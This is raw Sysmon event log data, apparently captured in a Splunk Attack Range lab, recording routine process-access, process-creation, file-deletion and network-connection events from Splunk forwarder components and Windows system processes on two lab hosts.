11:05:19.984{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295182Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:19.983{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295181Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:19.983{C8EA50B7-F11C-6215-0500-000000003802}412528C:\Windows\system32\csrss.exe{C8EA50B7-14EF-6216-B706-000000003802}6628C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000295180Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:19.982{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-14EF-6216-B706-000000003802}6628C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000295179Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:19.981{C8EA50B7-14EF-6216-B706-000000003802}6628C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000295178Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:19.619{C8EA50B7-14EF-6216-B606-000000003802}44563332C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295177Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:19.308{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-14EF-6216-B606-000000003802}4456C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295176Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:19.304{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295175Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:19.304{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295174Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:19.304{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295173Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:19.303{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295172Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:19.303{C8EA50B7-F11C-6215-0500-000000003802}412528C:\Windows\system32\csrss.exe{C8EA50B7-14EF-6216-B606-000000003802}4456C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000295171Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:19.302{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-14EF-6216-B606-000000003802}4456C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000295170Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:19.301{C8EA50B7-14EF-6216-B606-000000003802}4456C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000295169Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:19.113{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=04AF2760025DED96E9B47C865A91BCE5,SHA256=72E51D63059CF66BFCEAEA9F3AE9105F01E748E99712342EE61C1FE9306AAEFE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219302Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:20.677{4F8D34B0-F11D-6215-1D00-000000003902}1876NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-04ffbe17aee3fbf0d\channels\health\surveyor-20220223083230-149MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219301Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:20.599{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5C472A644199CF669401088C5FFEF6C1,SHA256=4814DF1E4DB70612F3C63964A37EC894C1D4982D64B29657DC3ADF078EABE8FC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000295197Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:20.774{C8EA50B7-14F0-6216-B806-000000003802}57923544C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295196Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:20.574{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-14F0-6216-B806-000000003802}5792C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295195Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:20.558{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295194Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:20.558{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295193Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:20.558{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295192Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:20.558{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295191Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:20.558{C8EA50B7-F11C-6215-0500-000000003802}4122608C:\Windows\system32\csrss.exe{C8EA50B7-14F0-6216-B806-000000003802}5792C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000295190Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:20.558{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-14F0-6216-B806-000000003802}5792C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000295189Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:20.561{C8EA50B7-14F0-6216-B806-000000003802}5792C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000295188Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:20.263{C8EA50B7-14EF-6216-B706-000000003802}66286752C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000295187Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:20.148{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1E132854A9EDB67BB19C9979F8D812CA,SHA256=56A7B6106A4607F74F1F667702349F384F274201E3991DE1CF7874E489A8401D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000219305Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:19.849{4F8D34B0-F11C-6215-1000-000000003902}940C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse187.141.52.101customer-187-141-52-101-sta.uninet-ide.com.mx49802-false10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal3389ms-wbt-server 354300x8000000000000000219304Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:19.629{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51512-false10.0.1.12-8000- 23542300x8000000000000000219303Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:21.740{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2ED7D947C9A823E4CF46F4A8811AAB21,SHA256=6680FCC19056BCBE3B6E31538BB55F0F0F179EDFADCAEBDE09E1614A21081E93,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000295206Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:21.245{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-14F1-6216-B906-000000003802}4864C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 